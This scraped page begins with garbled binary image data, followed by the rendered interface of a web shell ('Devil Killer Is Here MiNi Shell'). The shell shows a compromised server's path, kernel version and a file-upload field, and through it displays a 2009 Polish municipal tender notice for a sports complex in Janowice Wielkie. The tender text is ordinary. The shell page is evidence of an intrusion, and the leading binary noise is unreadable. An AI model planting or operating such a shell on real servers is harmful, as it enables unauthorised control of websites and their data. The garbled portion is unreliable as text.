JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/41470-N-2009.html

<p class="kh_header"><b>Janowice Wielkie: Budowa kompleksu sportowego _Moje boisko ORLIK 2012_ 
 w Janowicach Wielkich  przy ul. Sportowej</b><br>
<b>Numer ogłoszenia: 41470 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowice Wielkie , ul. Kolejowa 2, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 075 7515124, faks 075 7515124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.janowice-wielkie.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu sportowego _Moje boisko ORLIK 2012_ 
 w Janowicach Wielkich  przy ul. Sportowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia  obejmuje
a) -  wykonanie podbudowy pod boisko do piłki nożnej:
grunt rodzimy, warstwa odsączająca z piasku lub pospółki - gr.10 cm, warstwa konstrukcyjna z kruszywa kamiennego ( fr.31,5 - 63mm) - gr.10 cm, warstwa klinująca z kruszywa kamiennego    (fr.4 - 31,5mm) - gr.5 cm, warstwa wyrównująca z mieszanki drobnej  (fr.0,075 - 4mm) - gr.4 cm; 

b)-  wykonanie podbudowy boiska wielofunkcyjnego:
grunt rodzimy,  warstwa odsączająca z  piasku lub pospółki - gr. 10 cm, warstwa konstrukcyjna z kruszywa kamiennego ( fr.31,5 - 63mm) - gr.10 cm, warstwa klinująca z kruszywa kamiennego    (fr.0 - 31,5mm) - gr.5 cm, 

c)  -wykonanie boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow . całkowitej 1860m2 (pole gry 26,0 x 56,0 m) o nawierzchni syntetycznej typu sztuczna trawa - włókna: monofil wiązany lub włókna niefibrylowane , o wysokości całkowitej trawy min. 52 [mm], w kolorze zielonym , z wklejonymi liniami boiska , wyprofilowane spadki nawierzchni w kierunku  podłużnym boiska  -  od 0,4%  do 1% , wypełnienie trawy syntetycznej : piasek kwarcowy ; granulat EPDM o śr. min. 0,5 [mm] do max . 2,5 [mm] , w kolorze czarnym,  pochodzący z produkcji dedykowanej/pierwotnej ,  

d)  - wykonanie boiska wielofunkcyjne o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 (pole do gry 15,1 x 28,1 m) , na którym umieszczone zostaną : boisko do piłki koszykowej        i boisko do gry w siatkówkę o nawierzchni syntetycznej poliuretanowej w kolorze ceglastym ( linie do koszykówki - białe, do siatkówki żółte ) : warstwa wykończeniowa-bezspoinowa, nie  prefabrykowana nawierzchnia poliuretanowa -dwuwarstwowa o całkowitej grubości 16 mm      ( mata z granulatu SBR 8mm, mata z  granulatu EPDM 8mm) ,wykonana na 35 mm podkładzie elastycznym pod nawierzchnie sportowe, wyprofilowane spadki nawierzchni w kierunku  podłużnym boiska  -  od 0,4%  do 1% ,
Własności użytkowe nawierzchni: bezspoinowość, antypoślizgowość, elastyczność, odporność na starzenie i promieniowanie UV, minimalne koszty eksploatacji, estetyczny wygląd, do użytkowania w obuwiu z kolcami,  przepuszczalna dla wody,
   
e)   - wykonanie drenażu gałązkowego  pod płytą dwóch boisk - z rur drenarskich z filtrem,       Dz     126mm, i = 0,5%, z odprowadzeniem wód rurami PVC fi 200 , i=1,5% ( ok.190mb) do  jednej(1) studni chłonnej fi 1800 , ilość studni pośrednich - narożnych: PVC fi 1000 - 1 szt , PVC   fi 600- 1szt,  PVC fi 425- 4 szt- zgodnie z rysunkiem - schematem drenażu.

f)  - wykonanie oświetlenia boisk -  za pomocą projektorów - naświetlaczy typu IZX-D 400W MT wyposażonych w lampy mtalo-halogenowe 400W , umieszczonych na  8 slupach stalowych       o wysokości 12 m  i ustawionych na fundamencie prefabrykowanym wykonanym wg  warunków producenta; oprawy mocowane na poziomych wysięgnikach (belki poprzeczne T).  
g) - wykonanie linii oświetlenia boisk - typ kabla  YKY 5*16 mm2 o dł.~ 290m i zasilenia      budynku zaplecza -  typ kabla YKY 5*25 mm2  o dł. ~ 45 m , dł. wykopu ~25 m .
Trasa linii oświetlenia boisk i zasilenia   budynku zaplecza,  lokalizacji słupów i rozmieszczenia    opraw- zgodnie z planem zagospodarowania terenu.

h) - wykonanie ogrodzenia terenu boisk- ~286 mb o wysokości 6 m, systemowe, z siatki stalowej,ocynkowanej o fi 2,5 mm -powlekanej tworzywem PCV w kolorze zielonym , o oczkach max. 50x50mm, rozciągniętej na słupach stalowych kotwionych w fundamencie, bez cokołu.
Siatka usztywniona dodatkowo przeplecioną przez każde oczko i na całej długości  - linką stalową .Na wysokości 6 m- linka powinna być przepleciona wzdłuż dolnej i górnej krawędzi ogrodzenia oraz dodatkowo na wysokości 2 i 4 metrów.
Przy tym rozwiązaniu nie występuje dodatkowe zabezpieczenie w formie piłkochwytów.
W ogrodzeniu należy przewidzieć: rozwierną , zamykaną , dwuskrzydłową bramę      o szerokości 4 m i wysokości 2,50 m - 2 sztuki  oraz zamykaną, rozwierną furtkę o szer. 1,20 m i wysokości 2,0 m  - 3 sztuki.
 Miejsce usytuowania wskazane zostanie przez Zamawiającego - w trybie roboczym.

i)  - położenie obrzeży betonowych - ~286 mb  , o wym. 25x8x100[cm] układanych na ławie         z betonu B15 z oporem   oddzielających boiska od siebie jak i  od sąsiadujących elementów terenu ,

j)   - wykonanie ciągu pieszego przy zapleczu socjalnym - ~ 185 m2 , kostka betonowa gr.      6 cm w kolorze szarym typu POLBRUK ułożona na podbudowie  z piasku i kruszywa, zamknięta obrzeżami betonowymi ~ 60 mb ,

k)  -dostawę i montaż prefabrykowanego lub kontenerowego  zaplecza socjalnego,  łącznie z wykonaniem fundamentów -  wg  wytycznych i projektu producenta. 
Zamawiający nie dopuszcza zastosowania drewna do elewacji zaplecza socjalnego, jak również jego wykonania w technologii drewnianej. 
Jeżeli nie jest wymagane fundamentowanie - do oferty należy dołączyć stosowne oświadczenie producenta wraz z dokładnym opisem sposobu jego posadowienia     
i przygotowania podłoża.
Zaplecze socjalne w systemie kontenerowym musi spełniać wszystkie warunki        i wymagania określone w Projekcie budowlanym opracowanym na zlecenie Ministerstwa Sportu ( patrz: SIWZ- Cz. III Opis przedmiotu zamówienia)
      
l)   - wykonanie przyłącza kanalizacji sanitarnej  - z rur PCV-U kanalizacyjnych fi 160mm    dł .~15 mb , wodociągowej z rur PE fi 50mm - dł.~12 mb i fi. 90mm-dł.~2mb, studni wodomierzowej z kręgów betonowych, zamontowanie hydrantu  podziemnego fi 80 mm - z zasuwą, wpięcie przyłącza  do istniejącej sieci wodociągowej, wykonanie zbiornika bezodpływowego  - dwukomorowego, o pojemności  V= 9 m3 ,  z kręgów betonowych  fi 1500 mm,

m)  - dostawa i montaż ławek - 20 sztuk ławek  parkowych - drewnianych ( deski gr. minimum 32 mm mocowane w sposób wandalochronny,  zabezpieczone środkiem impregnacyjnym i polakierowane ( pożądany kolor : żółty, czerwony lub zielony    ) ,  na konstrukcji betonowej , o dł. 2m każda , na trwale mocowane w podłożu utwardzonym w sposób uniemożliwiający ich szybki demontaż. 
Miejsca usytuowania wskazane zostaną przez Zamawiającego -po wykonaniu prac głównych.

n)  -  dostawa i montaż wyposażenia boiska do piłki nożnej : 
                         : 
- jednego (1) kompletu  (= 2 szt.) bramek do piłki nożnej o wym. 2 x 5m  , mocowanych poprzez tuleje - na stałe w podłożu , wykonanych z metalowych elementów ze stali  i cynkowanych  galwanicznie , przy czym rama  główna  ma być wykonana w całości  ( spawane naroża) z zaczepami wandaloochronnymi  do mocowania siatki i odciągami do naprężania siatki.
Siatka  o mocnym, grubym, bezwęzełkowym splocie -  w  kolorze : białym lub żółtym 
-  czterech (4) kompletnych chorągiewek narożnych.
           
o)  dostawa i montaż wyposażenia boiska wielofunkcyjnego:
- jednego (1) kompletu zestawu do gry w koszykówkę : kosze stalowe o  konstrukcji  dwusłupowej  -    ( 2 sztuki) z tablicami epoksydowymi o wym. 105x180 cm  i wzmocnionymi obręczami uchylnymi, siatka do obręczy łańcuchowa - cynkowana, 8-zaciskowa.
Konstrukcja  kosza i obręczy - cynkowana ogniowo.
Konstrukcja  koszy na stałe mocowana w podłożu. 
          
- jednego (1)  zestawu do gry w siatkówkę:  dwa (2) słupki aluminiowe - przenośne , naciągi stalowe, urządzenie naciągowe: zewnętrzne z osłoniętą profilem aluminiowym -śrubą naciągu siatki i hakiem zaczepowym .
Sposób mocowania haków zaczepowych musi  umożliwiać zawieszanie siatki na dowolnej wysokości.
Siatka o silnym, grubym splocie - w kolorze czarnym z górną listwą białą .  
Mocowanie słupków - przenośne , w tulejach osadzonych w podłożu + dekle maskujące tuleje (po wyjęciu słupków).
Stanowisko sędziowskie do siatkówki z mechaniczną regulacja wysokości podestu i kółkami ułatwiającymi transport.

Roboty takie jak:
- rozbiórka , wywiezienie i utylizacja istniejącej nawierzchni bitumicznej , 
- rozbiórka i wywiezienie istniejącego prefabrykowanego, betonowego ogrodzenia,
- rozbiórka i wywiezienie betonowych obrzeży,
- likwidacja istniejącego hydrantu w pasie projektowanego boiska piłkarskiego,
- demontaż i wywiezienie istniejących słupów oświetleniowych,
- przeniesienie słupa energetycznego linii napowietrznej nn, kolidującego z ogrodzeniem projektowanego boiska wielofunkcyjnego,
- wycinka drzew kolidujących z projektowaną linią boisk,
- urządzenie terenu zielonego tj. sadzenie krzewów, posianie trawy-
wykona Zamawiający  własnym staraniem i na własny koszt  w terminie nie kolidującym z prowadzeniem robót przez wykonawcę.
Grunt pochodzący z wykopów - składowany będzie przez wykonawcę na terenie objętym placem budowy , w miejscu  nie kolidującym z zagospodarowaniem terenu,
 - wykorzystany zostanie do formowania terenu objętego Planem Zagospodarowania Terenu,
 - nadmiar gruntu wywieziony będzie przez Zamawiającego po zakończeniu robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.23.24.51-8, 45.31.00.00-3, 45.33.22.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości   30.000 PLN ( słownie: trzydzieści tysięcy złotych) .
Wadium może być wniesione w następujących formach:pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych,poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
 (Dz. U. Nr 109, poz. 1158, z późniejszymi zmianami).
W przypadku składania przez wykonawcę wadium w formie gwarancji , gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego tj. Gminy Janowice Wielkie),  gwaranta ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib;
określenie wierzytelności, która ma być zabezpieczona gwarancją;kwotę gwarancji;
termin ważności gwarancji; zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż wykonawca ,  którego ofertę wybrano:odmówił podpisania umowy na warunkach określonych w ofercie,     lub nie wniósł zabezpieczenia należytego wykonania umowy, lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy .
Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie - na rachunek Zamawiającego, otwarty     w PLN . Wadium wnoszone w innej, niż  -pieniądz- dopuszczonej przez Zamawiającego formie /formach wykonawca wnosi do Zamawiającego  przy czym ,  w takim przypadku za termin doręczenia uważa się datę wpływu do Skarbnika Gminy  lub upoważnionego przez niego pracownika.  
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w -pieniądzu- za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 Ustawy, tj.: 
1)posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności; 

2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.:
a) zrealizowali w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie roboty budowlane odpowiadające swoim rodzajem          i wartością robotom budowlanym stanowiącym przedmiot  niniejszego zamówienia (budowa obiektów sportowych),  w tym :
-przynajmniej jedno boisko do piłki nożnej lub innych gier otwartych z murawą z trawy  syntetycznej o wartości przewyższającej kwotę 300.000 zł. brutto.
oraz
-przynajmniej jedno boisko do gier zespołowych o nawierzchni syntetycznej -poliuretanowej o wartości przewyższającej kwotę 300.000 zł. brutto.

b)    mają  do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi  do funkcji, jakie zostaną im powierzone lub posiadają  zobowiązanie innych podmiotów  do udostępnienia tych osób.
Wykonawca wraz z ofertą jest zobowiązany do przedstawienia  osób pełniących poniżej wymienione funkcje,  i które  muszą spełniać następujące warunki:
0soba proponowana do pełnienia funkcji KIEROWNIKA BUDOWY =  minimalna liczba osób : jedna (1) , minimalne  kwalifikacje: posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń  , minimalne doświadczenie zawodowe: co najmniej 24 miesięcy na stanowisku kierownika budowy branży budowlanej  lub kierownika robót branży drogowej, pełnienie funkcji kierownika budowy nad co najmniej jedną(1)  budową obiektów sportowych , w tym  nad realizacją boiska piłkarskiego  o murawie typu sztuczna trawa i boiska o nawierzchni poliuretanowej.
Przez wymagane minimalne doświadczenie zawodowe  należy rozumieć łączną ilość miesięcy przepracowanych  na stanowisku jak proponowane, przy realizacji wyżej wymienionych     robót .
Do doświadczenia zawodowego na stanowisku kierownika budowy nie sumuje się okresu  zatrudnienia danej osoby na innych budowach w tym samym czasie.
Przez wymagany staż pracy należy rozumieć  okres od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia o niniejszym zamówieniu na portalu centralnym UZP  - w Biuletynie Zamówień Publicznych .
Wymieniona osoba do pełnienia funkcji Kierownika Budowy musi:
- posiadać uprawnienia budowlane do kierowania robotami zgodnie z ustawą z 07.07.1994 r. Prawo budowlane w specjalności jak wyżej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów, 
- posiadać dokument potwierdzający przynależność do polskiej , właściwej Izby Inżynierów Budownictwa, z datą ważności na dzień otwarcia ofert.
0soba proponowana do pełnienia funkcji KIEROWNIKA ROBÓT SANITARNYCH= minimalna liczba osób : jedna (1), minimalne  kwalifikacje: posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności instalacyjnej bez ograniczeń- w zakresie sieci, instalacji i urządzeń  wodociągowych i kanalizacyjnych, minimalne doświadczenie zawodowe: 24 miesięcy na stanowisku kierownika robót branży   sanitarnej.
Przez wymagane minimalne doświadczenie zawodowe  należy rozumieć łączną ilość miesięcy  przepracowanych  na stanowisku jak proponowane, przy realizacji podobnych robót.
Do doświadczenia zawodowego na stanowisku kierownika robót nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie .
 Przez podobne roboty  branży sanitarnej rozumie się prace polegające na budowie lub przebudowie lub   remoncie sieci kanalizacyjnych lub wodociągowych.    
Wymieniona osoba do pełnienia funkcji kierownika robót musi:
- posiadać uprawnienia budowlane do kierowania robotami zgodnie z ustawą z 07.07.1994 r. Prawo budowlane w specjalności jak wyżej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów 
- posiadać dokument potwierdzający przynależność do polskiej , właściwej Izby Inżynierów          Budownictwa, z datą ważności na dzień otwarcia ofert.
0soba proponowana do pełnienia funkcji KIEROWNIKA ROBOT ELEKTRYCZNYCH= minimalna liczba osób : jedna (1), minimalne  kwalifikacje: posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności instalacyjnej bez ograniczeń -w zakresie sieci, instalacji  i urządzeń  elektrycznych i elektroenergetycznych, minimalne doświadczenie zawodowe: 36 miesięcy na stanowisku kierownika robót branży  elektrycznej lub elektroenergetycznej, w tym pełnienia funkcji kierownika robót nad minimum jedną (1) realizacją oświetlenia ulicznego.
Przez wymagane minimalne doświadczenie zawodowe  należy rozumieć łączną ilość miesięcy przepracowanych  na stanowisku jak proponowane, przy realizacji podobnych robót.
Do doświadczenia zawodowego na stanowisku kierownika robót nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie .
Przez podobne roboty  branży rozumie się prace polegające na budowie lub przebudowie lub remoncie  instalacji oświetlenia ulicznego .
 Wymieniona osoba do pełnienia funkcji kierownika robót musi:
- posiadać uprawnienia budowlane do kierowania robotami zgodnie z ustawą z 07.07.1994 r.       Prawo budowlane w specjalności jak wyżej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów
- posiadać dokument potwierdzający przynależność do polskiej , właściwej Izby Inżynierów  Budownictwa, z datą ważności na dzień otwarcia ofert.

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym kontraktowej do kwoty stanowiącej co najmniej równowartość oferowanej ceny ryczałtowej za wykonanie przedmiotu zamówienia.

4 ) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.


Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> PODMIOTOWYCH
Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 5 oraz Załącznik Nr 6 do  SIWZ.
[W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców w/w dokument może być złożony przez każdego z wykonawców składających ofertę wspólną albo może być złożony wspólnie, lecz w takim wypadku oświadczenie musi być podpisane przez pełnomocnika albo przez upoważnionych przedstawicieli każdego z wykonawców składających ofertę wspólną].


1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych winien załączyć do oferty :

1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
      W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub        więcej wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich.

2)	aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
      W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub   więcej wykonawców w ofercie musi być złożony przedmiotowy dokument dla każdego z nich.

2.W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia winien załączyć do oferty:
W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie zamówienia - oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie
1)   wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (budowa obiektów sportowych), w tym przynajmniej jedno boisko do piłki nożnej lub innych gier otwartych z murawą z trawy syntetycznej o wartości przewyższającej kwotę 300.000 zł. brutto oraz przynajmniej jedno boisko do gier zespołowych o nawierzchni syntetycznej poliuretanowej o wartości przewyższającej kwotę 300.000 zł. brutto, z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania  - wzór stanowi Załącznik Nr 4 do  SIWZ.
Dla każdej pozycji wykazu należy załączyć dokumenty (protokoły odbioru, referencje ,itp) potwierdzające, że roboty te zostały wykonane należycie.
2)   dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania   
 robotami budowlanymi w specjalnościach: konstrukcyjno-budowlanej , instalacyjnej - w zakresie sieci, instalacji  i urządzeń  wodociągowych i kanalizacyjnych, instalacyjnej  -w zakresie sieci, instalacji i urządzeń  elektrycznych i elektroenergetycznych oraz zaświadczenie/zaświadczenia, wydane przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby (dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem przez wykonawcę).

3.	W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia winien załączyć do oferty:

1)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
[Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia  Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej].

 PRZEDMIOTOWYCH
 
